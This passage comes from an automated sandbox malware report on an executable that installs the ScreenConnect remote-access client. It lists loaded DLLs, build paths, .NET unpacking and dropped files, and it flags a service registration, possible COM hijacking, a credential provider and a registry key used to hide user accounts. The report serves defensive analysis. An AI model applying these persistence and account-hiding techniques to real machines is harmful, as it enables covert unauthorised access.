                                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: tiG6Ep202n.exeStatic PE information: certificate valid
                                  Source: tiG6Ep202n.exeStatic file information: File size 5620136 > 1048576
                                  Source: tiG6Ep202n.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: tiG6Ep202n.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: tiG6Ep202n.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: tiG6Ep202n.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258312922.00000000026A2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2257943532.0000000002620000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2194187109.0000000000B5D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: tiG6Ep202n.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2168361518.0000000004D40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: tiG6Ep202n.exe, MSI9C5F.tmp.3.dr, 6699ff.msi.3.dr, MSI9C7F.tmp.3.dr, 6699fe.rbs.3.dr, 6699fd.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSIA097.tmp.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: tiG6Ep202n.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: tiG6Ep202n.exe, 6699ff.msi.3.dr, 6699fd.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSI9606.tmp.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258066054.0000000002662000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258066054.0000000002662000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: tiG6Ep202n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: tiG6Ep202n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: tiG6Ep202n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: tiG6Ep202n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  .NET source code contains potential unpacker
                                  Source: 0.2.tiG6Ep202n.exe.3140000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: 0.0.tiG6Ep202n.exe.fc78ec.4.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: tiG6Ep202n.exeStatic PE information: real checksum: 0x54d1c1 should be: 0x56b4ca
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeCode function: 0_2_018370B0 push eax; mov dword ptr [esp], ecx0_2_018370C1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_00BF7732 push eax; iretd 8_2_00BF7739
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_00BF7752 push 84036ACFh; iretd 8_2_00BF7759
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_00BF5A05 pushfd ; iretd 8_2_00BF5A1A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_048D9CF0 push eax; mov dword ptr [esp], ecx8_2_048D9CF1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_048DAFC0 push eax; mov dword ptr [esp], ecx8_2_048DAFC1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_05450523 push esp; ret 8_2_05450533
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_054542D0 push esp; ret 8_2_054542E3
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD344208CD push ebx; retf 9_2_00007FFD3442098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD344209D8 push ebx; retf 9_2_00007FFD3442098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD344222ED push ebx; retf 9_2_00007FFD344222FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34722F5A pushfd ; iretd 9_2_00007FFD34722F5B
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343F00BD pushad ; iretd 11_2_00007FFD343F00C1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD344008CD push ebx; retf 11_2_00007FFD3440098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD344009D8 push ebx; retf 11_2_00007FFD3440098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD344022B1 push ebx; retf 11_2_00007FFD344022FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD344023CD push ebx; iretd 11_2_00007FFD3440240A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD34708167 push ebx; ret 11_2_00007FFD3470816A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD3470545A push eax; iretd 11_2_00007FFD347054A1

                                  Persistence and Installation Behavior

                                  barindex
                                  Creates files in the system32 config directory
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                                  Possible COM Object hijacking
                                  Source: c:\program files (x86)\screenconnect client (a532d472f1ff1d4e)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-66e1-82ebbd1a2a17}\inprocserver32
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA097.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9C7F.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA097.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9C7F.tmpJump to dropped file
                                  Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (a532d472f1ff1d4e)Jump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Contains functionality to hide user accounts
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2172036237.0000000005880000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: rundll32.exe, 00000005.00000003.2166340137.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2267580181.000000001B6E2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258312922.00000000026A2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2257943532.0000000002620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: tiG6Ep202n.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
